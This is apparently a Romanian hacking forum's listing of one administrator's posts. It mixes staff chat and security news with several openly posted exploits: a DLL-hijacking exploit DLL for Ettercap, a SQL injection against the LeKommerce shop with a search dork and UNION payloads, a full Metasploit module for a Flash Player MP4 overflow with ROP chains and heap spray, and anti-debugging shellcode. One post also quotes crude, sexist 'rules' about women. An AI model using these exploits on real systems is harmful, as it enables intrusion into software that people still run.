Nytro
Administrators
Posts: 18772
Days Won: 729

Everything posted by Nytro

  1. Don't build your dreams around promises of raises; reality is a bit harsher.
  2. "and you don't know what the hell an SVN and Google Code are" Nice choice of words to show off how smart you are...
  3. Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately
By Brian Prince on March 13, 2012

Microsoft is urging organizations to apply the sole critical update in this month's Patch Tuesday release as soon as possible. The critical bulletin, one of six security bulletins issued as part of today's release, addresses two vulnerabilities in the Remote Desktop Protocol (RDP).

"A little about MS12-020...this bulletin addresses one Critical-class issue and one Moderate-class issue in Remote Desktop Protocol (RDP)," Angela Gunn, security response communications manager for Microsoft's Trustworthy Computing Group, explained in a blog post. "Both issues were cooperatively disclosed to Microsoft and we know of no active exploitation in the wild. The Critical-class issue applies to a fairly specific subset of systems - those running RDP - and is less problematic for those systems with Network Level Authentication (NLA) enabled."

"That said, we strongly recommend that customers examine and prepare to apply this bulletin as soon as possible," she added. "The Critical-class issue could allow a would-be attacker to achieve remote code execution on a machine running RDP (a non-default configuration); if the machine does not have NLA enabled, the attacker would not require authentication for RCE access."

Ben Greenbaum, senior principal software engineer for Symantec's Security Intelligence Group, agreed users should pay close attention to the RDP vulnerability. "RDP's purpose is to enable remote access from the Internet, but preferably to an authenticated user," he said. "In this case, a malicious attacker can potentially take complete control of the computer. Failed exploit attempts of this issue will likely result in the user being confronted with the blue screen of death. If an attacker can bypass standard memory protection measures, however, they will have access at the kernel level."

Those IT admins who use RDP to manage their machines over the internet, which is essentially the default in cloud-based installations such as Amazon's AWS, need to patch as quickly as possible, Qualys CTO Wolfgang Kandek opined. "If the patch cannot be applied that quickly or the necessary reboot cannot be scheduled, IT Admins should look into the available work-arounds that function immediately: protect the machine with restrictive firewalling, access RDP through a VPN service or switch to Microsoft's NLA protocol that is supported in newer versions of Windows (Vista+) and is not vulnerable to the attack," he said.

Besides the RDP bugs, this month's Patch Tuesday addressed five other vulnerabilities: two denial-of-service bugs and an escalation of privileges issue in Microsoft Windows; a remote code execution vulnerability in Microsoft Expression Design; and an escalation of privileges issue in Microsoft Visual Studio. All those issues are rated 'important' with the exception of one of the Windows denial-of-service bugs, which is rated 'moderate.'

Also today, Adobe updated its ColdFusion software to address a vulnerability in versions 9.0.1 and earlier for Windows, Macintosh and UNIX systems that could lead to a denial-of-service attack using a hash algorithm collision. The company said it was unaware of any attempts to exploit the vulnerability in the wild.

Source: Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately | SecurityWeek.Com
Via: Microsoft: RDP Vulnerability Should Be Patched Immediately - Slashdot
  4. win xp sp2 PEB IsBeingDebugged shellcode

#name: win xp sp2 PEB ISbeingdebugged shellcode
#Author: *********
#Contact: teo.manojlovic@skole.hr
#Date: 14.12.2009.

Here is the ASM code made using masm32. If the program is being run under a debugger, the shellcode will start beeping.

```asm
.386
.model flat, stdcall
option casemap :none

INCLUDE C:\MASM32\INCLUDE\WINDOWS.INC
INCLUDE C:\MASM32\INCLUDE\KERNEL32.INC
INCLUDE C:\MASM32\INCLUDE\USER32.INC
INCLUDE C:\MASM32\INCLUDE\MASM32.INC
INCLUDELIB C:\MASM32\LIB\KERNEL32.LIB
INCLUDELIB C:\MASM32\LIB\USER32.LIB
INCLUDELIB C:\MASM32\LIB\MASM32.LIB

.data
ExitMsg DB "Enter to Exit", 0

.code
start:
    assume fs:nothing
    mov eax, fs:[30h]        ; PEB
    mov eax, [eax+02h]       ; DWORD at PEB+2: BeingDebugged, SpareBool, low word of Mutant
    mov ebx, 7FFF8000h
    add ebx, 7FFF8000h
    inc ebx                  ; ebx = 0FFFF0001h (BeingDebugged=1, SpareBool=0, Mutant low word=0FFFFh)
    push 300h                ; dwDuration = 768 ms
    push 200h                ; dwFrequency = 512 Hz
    mov edx, 7c837a8fh       ; kernel32.Beep, hard-coded address for XP SP2
    cmp eax, ebx
    jnz exit                 ; not under a debugger: skip the beep
    call edx
exit:
    invoke ExitProcess, NULL
end start
```

Here is the dump of the code using OllyDbg:

```
00401000 >/$ 64:A1 30000000    MOV EAX,DWORD PTR FS:[30]
00401006 |. 8B40 02           MOV EAX,DWORD PTR DS:[EAX+2]
00401009 |. BB 0080FF7F       MOV EBX,7FFF8000
0040100E |. 81C3 0080FF7F     ADD EBX,7FFF8000
00401014 |. 43                INC EBX
00401015 |. 68 00030000       PUSH 300                                  ; /Duration = 768. ms
0040101A |. 68 00020000       PUSH 200                                  ; |Frequency = 200 (512.)
0040101F |. BA 8F7A837C       MOV EDX,kernel32.Beep                     ; |
00401024 |. 3BC3              CMP EAX,EBX                               ; |
00401026 |. 75 02             JNZ SHORT antidebu.0040102A               ; |
00401028 |. FFD2              CALL EDX                                  ; \Beep
0040102A |> 6A 00             PUSH 0                                    ; /ExitCode = 0
0040102C \. E8 01000000       CALL <JMP.&kernel32.ExitProcess>          ; \ExitProcess
00401031    CC                INT3
00401032 .-FF25 00204000      JMP DWORD PTR DS:[<&kernel32.ExitProcess>]; kernel32.ExitProcess
```

Here is the shellcode (note that the tail, `E8 01 00 00 00 CC FF 25 00 20 40 00`, calls ExitProcess through this binary's import table at 0x402000, so those bytes are not position-independent):

```
\x64\xA1\x30\x00\x00\x00\x8B\x40\x02\xBB\x00\x80\xFF\x7F\x81\xC3\x00\x80\xFF\x7F\x43\x68\x00\x03\x00\x00\x68\x00\x02\x00\x00\xBA\x8F\x7A\x83\x7C\x3B\xC3\x75\x02\xFF\xD2\x6A\x00\xE8\x01\x00\x00\x00\xCC\xFF\x25\x00\x20\x40\x00
```

Source: win xp sp2 PEB ISbeingdebugged shellcode

Efficient anti-debugging...
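The shellcode above does not test the BeingDebugged byte on its own: it loads a full DWORD from PEB+2 and compares it with 0xFFFF0001, so it also depends on the byte at PEB+3 being zero and on the low word of PEB->Mutant being 0xFFFF. The C below is an added example (not the shellcode author's code) that reproduces that exact comparison next to the plain byte test on constructed 8-byte PEB prefixes, so the case where the two disagree is visible; the sample prefixes and their values are constructed for the illustration, and the live `fs:[30h]` read only compiles on 32-bit Windows.

```c
#include <stdint.h>
#include <stdio.h>

/* First 8 bytes of the 32-bit PEB (layout stable across Windows versions):
 *   +0 InheritedAddressSpace   +1 ReadImageFileExecOptions
 *   +2 BeingDebugged           +3 SpareBool on XP; BitField on Vista and later
 *   +4 Mutant (HANDLE, normally INVALID_HANDLE_VALUE = 0xFFFFFFFF)
 */
#define PEB_BEING_DEBUGGED 2

static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Exact equivalent of the shellcode's test:
 *   mov eax, [peb+2] ; cmp eax, 0FFFF0001h
 * True only when BeingDebugged == 1, byte +3 == 0 and the low word of
 * Mutant == 0xFFFF all hold at the same time. */
int shellcode_style_check(const uint8_t peb[8])
{
    return read_le32(peb + 2) == 0xFFFF0001u;
}

/* Plain form: only the BeingDebugged byte matters. */
int byte_check(const uint8_t peb[8])
{
    return peb[PEB_BEING_DEBUGGED] != 0;
}

/* Constructed sample PEB prefixes (not captured from a real process). */
static const uint8_t PEB_DEBUGGED_XP[8]    = { 0, 0, 1, 0x00, 0xFF, 0xFF, 0xFF, 0xFF };
static const uint8_t PEB_DEBUGGED_FLAGS[8] = { 0, 0, 1, 0x08, 0xFF, 0xFF, 0xFF, 0xFF }; /* some BitField bit set */
static const uint8_t PEB_CLEAN[8]          = { 0, 0, 0, 0x00, 0xFF, 0xFF, 0xFF, 0xFF };

#if defined(_WIN32) && defined(_M_IX86)
#include <intrin.h>
/* On 32-bit Windows, read the live PEB the way the shellcode does (fs:[30h]). */
int is_debugged_live(void)
{
    const uint8_t *peb = (const uint8_t *)__readfsdword(0x30);
    return byte_check(peb);
}
#endif

int main(void)
{
    printf("XP-style PEB, debugged  : shellcode=%d byte=%d\n",
           shellcode_style_check(PEB_DEBUGGED_XP), byte_check(PEB_DEBUGGED_XP));
    printf("BitField set, debugged  : shellcode=%d byte=%d\n",
           shellcode_style_check(PEB_DEBUGGED_FLAGS), byte_check(PEB_DEBUGGED_FLAGS));
    printf("not debugged            : shellcode=%d byte=%d\n",
           shellcode_style_check(PEB_CLEAN), byte_check(PEB_CLEAN));
    return 0;
}
```

The second sample is the practical caveat: once anything is set in the byte after BeingDebugged (which became a real BitField after XP), the DWORD comparison silently reports "not debugged" while the byte test still fires. The same applies if Mutant is not -1.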
  5. Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll)

```c
/*
Exploit Title: Ettercap NG-0.7.3 DLL hijacking (wpcap.dll)
Date: 25/08/2010
Author: *********
Tested on: Windows XP SP3
Vulnerable extensions: .pcap

Compile and rename to wpcap.dll, create a file with the .pcap extension in the
same dir and visit http://chaossecurity.wordpress.com/
*/
#include <windows.h>
#include <stdlib.h>

#define DLLIMPORT __declspec (dllexport)

int evil(void);   /* forward declaration: evil() is defined below the exports */

/* Every export Ettercap resolves from wpcap.dll is stubbed to run the payload */
DLLIMPORT void pcap_findalldevs() { evil(); }
DLLIMPORT void pcap_close() { evil(); }
DLLIMPORT void pcap_compile() { evil(); }
DLLIMPORT void pcap_datalink() { evil(); }
DLLIMPORT void pcap_datalink_val_to_description() { evil(); }
DLLIMPORT void pcap_dump() { evil(); }
DLLIMPORT void pcap_dump_close() { evil(); }
DLLIMPORT void pcap_dump_open() { evil(); }
DLLIMPORT void pcap_file() { evil(); }
DLLIMPORT void pcap_freecode() { evil(); }
DLLIMPORT void pcap_geterr() { evil(); }
DLLIMPORT void pcap_getevent() { evil(); }
DLLIMPORT void pcap_lib_version() { evil(); }
DLLIMPORT void pcap_lookupdev() { evil(); }
DLLIMPORT void pcap_lookupnet() { evil(); }
DLLIMPORT void pcap_loop() { evil(); }
DLLIMPORT void pcap_open_live() { evil(); }
DLLIMPORT void pcap_open_offline() { evil(); }
DLLIMPORT void pcap_setfilter() { evil(); }
DLLIMPORT void pcap_snapshot() { evil(); }
DLLIMPORT void pcap_stats() { evil(); }

/* Payload: launch calc, then terminate the host process */
int evil(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}
```

Source: Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll)

I posted this just as a reminder of this "trick"...
  6. Pff, I don't know what the manele song is called
  7. If it's about a local network, Microsoft is worth every penny here...
- Communicator (now Lync) allows conferences
- Outlook lets you set up meetings
- Sharing is simple and efficient
...............................
That's unless you're referring to source code management, which is another story.
  8. ```c
#include <string.h>

int main(int argc, char* argv[])
{
    // argc holds the number of parameters (+1: the executable itself is argv[0])
    // argv[1]... hold the parameters themselves
    // Loop with a for and check whether a parameter is "-name"; if it is,
    // the next parameter, if it exists, will be that file
    const char *file = NULL;
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-name") == 0 && i + 1 < argc)
            file = argv[i + 1];
    }
    return file ? 0 : 1;
}
```
  9. As I said, a moderator/administrator probably made this decision, and honestly, I don't know who yet. The problem is that we don't interfere with decisions made by another staff member (as far as possible); we discuss among ourselves and then reach a conclusion. It would be rather silly for someone to hand out a ban and someone else to lift it... When I find out what it's about, you'll probably get the account back; be patient for a day or two.
  10. Thanks, permanent ban.
  11. I'm at work and couldn't look over it to give my opinion; stop acting childish, like an "attention whore". The code is nicely organized, but I don't have time to read it to see exactly what it's about; I'll look at it tonight.
  12. If his name isn't "Nytro", it's all for nothing anyway.
  13. Hackers: http://2.bp.blogspot.com/-COoyZ5u_me8/T124fMkzWZI/AAAAAAAAFMw/WjjETqyp-fo/s640/Finally+Google+Chrome+gets+hacked+at+Pwn2Own.jpg

Vupen Security and Sergey Glazunov independently managed to penetrate Google Chrome's security defenses at the Pwn2Own and 'Pwnium' contests respectively. The annual competition invites ethical hackers from around the world to attempt to hack into the most popular web browsers, exposing vulnerabilities and loopholes in the browsers' security in the process while grabbing a handsome reward.

At this year's competition, the co-founder and head of research of Vupen, Chaouki Bekrar, and his team managed to break into Google Chrome in less than 5 minutes, in the process quashing talk of the browser's unquestionable security. They used "a pair of zero-day vulnerabilities to take complete control of a fully patched 64-bit Windows 7 (SP1) machine." For the successful break-in, Vupen has won itself 32 points.

Google's Chrome security team knew that the Flash Player plugin sandbox is significantly weaker and that an exploit against Chrome's Flash Player would have to go through a certain path. Having figured out that Vupen used that technique (from the May video), Google decided to add a specific protection for Flash.

The hack qualifies him for one of the top $60,000 prizes that are part of Google's $1 million Pwnium challenge, and could be the launch of a new security career. VUPEN co-founder Chaouki Bekrar, an outspoken exploit writer who insisted the team deliberately targeted Chrome to prove a point, was uncharacteristically coy when asked if the faulty Chrome code came from Adobe. "It was a use-after-free vulnerability in the default installation of Chrome," he said. "Our exploit worked against the default installation so it really doesn't matter if it's third-party code anyway," Bekrar said, ZDNet reports.

IE 9 on Windows 7 was also hacked, again through a complicated hack that had to circumvent the browser's sandbox. Microsoft, however, may not respond so rapidly, as its quality testing procedure usually takes a few months to fix bugs like these. Safari on Mac OS X Snow Leopard, along with Firefox and IE 8 on Windows XP, was also hacked.

Source: Finally Google Chrome gets hacked at Pwn2Own | The Hacker News (THN)
  14. I bought "The Man's Bible" today and I can say it's brilliant:
- "Drink a beer while you pee, to illustrate the expression 'in one end and out the other'"
- "The right wine for any meal is, surprisingly, beer"
- "Don't get into a fight in a country bar unless you've won at least one wrestling contest in your life"
- "If a girl doesn't take her bra off during a massage, it's clear you won't get anything. Give up and open a can of beer"
- "After a girl with braces has satisfied you orally, tell her you enjoyed riding the rails and from now on call her CFR"
- "When a girl says she doesn't do oral, hold her tenderly in your arms and tell her it's okay, no problem... others do"
- "A man can under no circumstances describe a fat woman using the phrase 'She has a pretty face'"
And many more. It's about today's "men", who are becoming more and more like women, and it tries to define, through 900+ rules, what a real man looks like.
  15. Design: copied from ISR. Categories: copied from RST. News: ((void *)0)
  16. There has to be collaboration between the sysadmin and the programmer; as a sysadmin you can't block, for example, "<script>", because you might be hosting a forum like RST and you'd block half the posts. As a sysadmin, you can't put in rules to prevent SQL injection, such as "UNION", because there can be perfectly valid messages containing that word that have nothing whatsoever to do with SQLi. You can't even block two requests in less than a second, because what happens here is that you open two tabs and one of them gets blocked, and you risk losing clients. Programmers come with all sorts of demands so that their scripts work, which is normal, but it's their job to take care of the security of the WEB APPLICATIONS, not the sysadmins'. That they use 3rd-party scripts is, again, their problem. It's not the sysadmin's fault that the application has SQL injection. And whatever we say, administrators still spend a lot of time checking logs, seeing where problems can show up in the application and trying to fix them from the administration side, which, I repeat, is not OK, because problems can show up later. Sysadmin: "Dude, you're an idiot, you have SQL injection in the application, here are some logs, look, some people hit it with Acunetix and others with Havij, this is the vulnerable parameter, fix the problem, I'm not going to sit here DROPping packets based on hundreds of vectors that can be used just because you don't filter the application's parameters".
  17. Benny, go talk to a sysadmin and then we'll discuss.
  18. Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37

Gobejishvili (longrifle0x) from The Vulnerability Laboratory Research Team discovered a Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37. GOM Player (Gretech Online Movie Player) is a 32/64-bit media player for Microsoft Windows, distributed by the Gretech Corporation of South Korea.

A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity.

In this case, the vulnerability can be exploited by local or remote attackers, and the vulnerable module is GomU+0x125cb7.

Proof of Concept:
1) Download & open the software client
2) Click Open ==> Url..
3) Put in the vulnerability code
4) Now you will see the result

http://www.youtube.com/watch?v=uN87KAm53Zg&feature=player_embedded

In buffer overflow attacks, the extra data may contain code designed to trigger actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information.

Source: [POC] Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37 | The Hacker News (THN)
  19. printf() tricks

Agenda:
• Shifting the stack pointer & arbitrary mem writes…
• … in order to exploit format string bugs without %n
• When is a NULL pointer not just a NULL pointer?
• …don't expect printf() & family to crash on NULL pointers
• These are just a few things I played with a while back

Download: http://cdn03.exploit-db.com/wp-content/themes/exploit/docs/18577.pdf
  20. SQLI Online Shop LeKommerce

```
# Author: Mazt0r
# Exploit Title: Online Shop SQLI LeKommerce
# Date: 04 MARCH 2012
# software: LeKommerce
# link: http://www.lekommerce.com/
# Version: "All versions"
# Category: Commerce online
# Tested on: Linux

D0rk: inurl:secc.php?id=

=====================================
Exploit :
======================
http://localhost/path/secc.php?id={sqli}

======================
Example:
======================
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7+from+information_schema.tables--

======================
dbs (tables):
======================
+--------------------------------+
| t_clientes                     |
| t_colores                      |
| t_colores_idiomas              |
| t_configuracionglobal          |
| t_emailing                     |
| t_emailingcliente              |
| t_facturascompra               |
| t_facturasventa                |
| t_familias                     |
| t_familias_idiomas             |
| t_formaspago                   |
| t_idiomas                      |
| t_incidencias                  |
| t_iva                          |
| t_marcas                       |
| t_menusuperior                 |
| t_noticias                     |
| t_productos                    |
| t_productos_idiomas            |
| t_proveedores                  |
| t_provincias                   |
| t_rel_productos_tallas_colores |
| t_rel_tallas_colores           |
| t_seccionesproductos           |
| t_seccionesproductos_idiomas   |
| t_series                       |
| t_subfamilias                  |
| t_subfamilias_idiomas          |
| t_tallas                       |
| t_tallas_idiomas               |
| t_tiposperfiles                |
| t_traducciones                 |
| t_usuarios                     |
+--------------------------------+

PASSWD: TEXT PLAIN? <<<--- SECURE? EPIC!

--------------Gr33tZ------------------
DDLR - CYBERLOCOS - Thelatin - K4rl - Cpum4 - N350k - hkm - nitr0us - Xianur0 - All Friends!
----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
```

Source: SQLI Online Shop LeKommerce
  21. Adobe Flash Player .mp4 'cprt' Overflow

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Adobe Flash Player MP4 'cprt' Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in Adobe Flash Player. By supplying
        a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code
        execution under the context of the user. This vulnerability has been exploited in
        the wild as part of the "Iran's Oil and Nuclear Situation.doc" e-mail attack.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Alexander Gavrun',  # Vulnerability discovery
          'sinn3r',            # Metasploit module
          'juan vazquez'       # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-0754' ],
          [ 'OSVDB', '79300'],
          [ 'BID', '52034' ],
          [ 'URL', 'http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-03.html' ]
        ],
      'Payload'        =>
        {
          'StackAdjustment' => -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Flash Player 11.1.102.55
          # Flash Player 10.3.183.10
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ],
          [ 'IE 7 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4',               'Ret' => 0x77c15ed5 } ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre,    'Offset' => '0x5f4',               'Ret' => 0x77c15ed5 } ],
          [ 'IE 7 on Windows Vista',  { 'Rop' => nil,     'Offset' => '0x600',               'Ret' => 0x0c0c0c0c } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 15 2012",
      'DefaultTarget'  => 0))
  end

  def junk(n=4)
    return rand_text_alpha(n).unpack("V").first
  end

  def nop
    return make_nops(4).unpack("V").first
  end

  def get_payload(t)
    if t['Rop'].nil?
      code = ""
    else
      code = "\xbc\x0c\x0c\x0c\x0c" #Fix the stack to avoid a busted encoder
    end

    code << payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # Both ROP chains generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      rop = [
        0x77c4e392, # POP EAX # RETN
        0x77c11120, # <- *&VirtualProtect()
        0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
        junk,
        0x77c2dd6c,
        0x77c4ec00, # POP EBP # RETN
        0x77c35459, # ptr to 'push esp # ret'
        0x77c47705, # POP EBX # RETN
        0x00000800, # <- change size to mark as executable if needed (-> ebx)
        0x77c3ea01, # POP ECX # RETN
        0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
        0x77c46100, # POP EDI # RETN
        0x77c46101, # ROP NOP (-> edi)
        0x77c4d680, # POP EDX # RETN
        0x00000040, # newProtect (0x40) (-> edx)
        0x77c4e392, # POP EAX # RETN
        nop,        # NOPS (-> eax)
        0x77c12df9, # PUSHAD # RETN
      ].pack("V*")
    when :jre
      rop = [
        0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
        0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
        0x7c347f98, # RETN (ROP NOP)
        0x7c3415a2, # JMP [EAX]
        0xffffffff,
        0x7c376402, # skip 4 bytes
        0x7c351e05, # NEG EAX # RETN
        0x7c345255, # INC EBX # FPATAN # RETN
        0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
        0x7c344f87, # POP EDX # RETN
        0xffffffc0, # Value to negate, will become 0x00000040
        0x7c351eb1, # NEG EDX # RETN
        0x7c34d201, # POP ECX # RETN
        0x7c38b001, # &Writable location
        0x7c347f97, # POP EAX # RETN
        0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
        0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
        0x7c345c30, # ptr to 'push esp # ret '
      ].pack("V*")
    end

    pivot = [0x77C1CAFB].pack('V*') #POP/POP/RET
    pivot << [junk].pack('V*')
    pivot << [t.ret].pack('V*')

    code = pivot + rop + code

    return code
  end

  def get_target(agent)
    #If the target is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
      return targets[1]  #IE 6 on Windows XP SP3
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
      return targets[2]  #IE 7 on Windows XP SP3
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
      return targets[3]  #IE 8 on Windows XP SP3
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
      return targets[5]  #IE 7 on Windows Vista
    else
      return nil
    end
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("#{cli.peerhost}:#{cli.peerport} Browser not supported, will not launch attack: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}")

    # The SWF requests our MP4 trigger
    if request.uri =~ /\.mp4$/
      print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...")
      mp4 = create_mp4(my_target)
      send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
      return
    end

    if request.uri =~ /\.swf$/
      print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...")
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    p = get_payload(my_target)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))

    js_pivot = <<-JS
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    heap_obj.debug(true);
    for (var i=1; i < 0x1C2; i++) {
      heap_obj.alloc(block);
    }
    heap_obj.debug(true);
    JS

    js_pivot = heaplib(js_pivot, {:noobfu => true})

    swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
    swf_uri << "/Exploit.swf"
    print_status("#{cli.peerhost}:#{cli.peerport} #{swf_uri}")

    html = %Q|
    <html>
    <head>
    <script>
    #{js_pivot}
    </script>
    </head>
    <body>
    <center>
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="test" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="#{swf_uri}" />
    <embed src="#{swf_uri}" quality="high" width="1" height="1" name="test" align="middle" allowNetworking="all" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer">
    </embed>
    </object>
    </center>
    </body>
    </html>
    |

    html = html.gsub(/^\t\t/, '')

    #
    # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource
    #
    proc = Proc.new do |cli, req|
      on_request_uri(cli, req)
    end
    add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil

    print_status("#{cli.peerhost}:#{cli.peerport} Sending html...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

  def cleanup
    remove_resource('/test.mp4') rescue nil
    super
  end

  def exploit
    @swf = create_swf
    super
  end

  def create_swf
    path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0754.swf" )
    fd = ::File.open( path, "rb" )
    swf = fd.read(fd.stat.size)
    fd.close

    return swf
  end

  def create_mp4(target)
    mp4 = ""
    mp4 << "\x00\x00\x00\x18"
    mp4 << "ftypmp42"
    mp4 << "\x00\x00\x00\x00"
    mp4 << "mp42isom"
    mp4 << "\x00\x00\x00\x0D"
    mp4 << "cprt"
    mp4 << "\x00\xFF\xFF\xFF"
    mp4 << "\x00\x00\x00\x00"
    mp4 << "\x0c\x0c\x0c\x0c" * 2586

    return mp4
  end

end

=begin
C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx
C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx

(510.9b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=03e46810 ecx=0396b160 edx=00000004 esi=03e46cd4 edi=00000000
eip=10048b65 esp=0428fd10 ebp=0428feb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx -
Flash10x+0x48b65:
10048b65 ff5008          call    dword ptr [eax+8]    ds:0023:0c0c0c14=????????
=end
```

Source: Adobe Flash Player .mp4 'cprt' Overflow
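To see what the trigger built by `create_mp4` above actually looks like at the container level, here is an added example (not part of the Metasploit module): a minimal ISO BMFF top-level box walker in C, run over a constructed copy of that file with the 0x0c0c0c0c filler cut from 2586 dwords to 5. The walker is generic and stops at the first box whose declared size does not fit, which is the kind of check a parser or a detection script would want. It does not claim anything about the Flash bug itself beyond what the module's bytes show.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

struct box {
    size_t   offset;     /* where the 8-byte box header starts */
    uint32_t size;       /* declared size including the header (0 = to end of file) */
    char     type[5];    /* four-character code, NUL-terminated */
    int      truncated;  /* 1 if the declared size cannot fit in the buffer */
};

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Walk the top-level boxes of an ISO BMFF (MP4) buffer. Returns the number of
 * boxes recorded. The walk stops at the first box that cannot be trusted: a
 * size below 8 (smaller than its own header) or a size that runs past the
 * end of the buffer; that box is recorded with truncated = 1. */
size_t walk_boxes(const uint8_t *buf, size_t len, struct box *out, size_t max)
{
    size_t off = 0, n = 0;
    while (n < max && len - off >= 8) {
        struct box *b = &out[n++];
        uint32_t size = be32(buf + off);
        b->offset = off;
        b->size = size;
        memcpy(b->type, buf + off + 4, 4);
        b->type[4] = '\0';
        b->truncated = 0;
        if (size == 0)
            size = (uint32_t)(len - off);      /* box extends to end of file */
        if (size < 8 || size > len - off) {
            b->truncated = 1;
            break;
        }
        off += size;
    }
    return n;
}

/* Constructed copy of the module's create_mp4() output, filler shortened
 * from 2586 dwords of 0x0c0c0c0c to 5 (the walk ends the same way). */
static const uint8_t TRIGGER[] = {
    0x00,0x00,0x00,0x18, 'f','t','y','p', 'm','p','4','2',
    0x00,0x00,0x00,0x00, 'm','p','4','2', 'i','s','o','m',
    0x00,0x00,0x00,0x0D, 'c','p','r','t',
    0x00,0xFF,0xFF,0xFF,                     /* FullBox version + flags */
    0x00,0x00,0x00,0x00,
    0x0c,0x0c,0x0c,0x0c, 0x0c,0x0c,0x0c,0x0c, 0x0c,0x0c,0x0c,0x0c,
    0x0c,0x0c,0x0c,0x0c, 0x0c,0x0c,0x0c,0x0c
};
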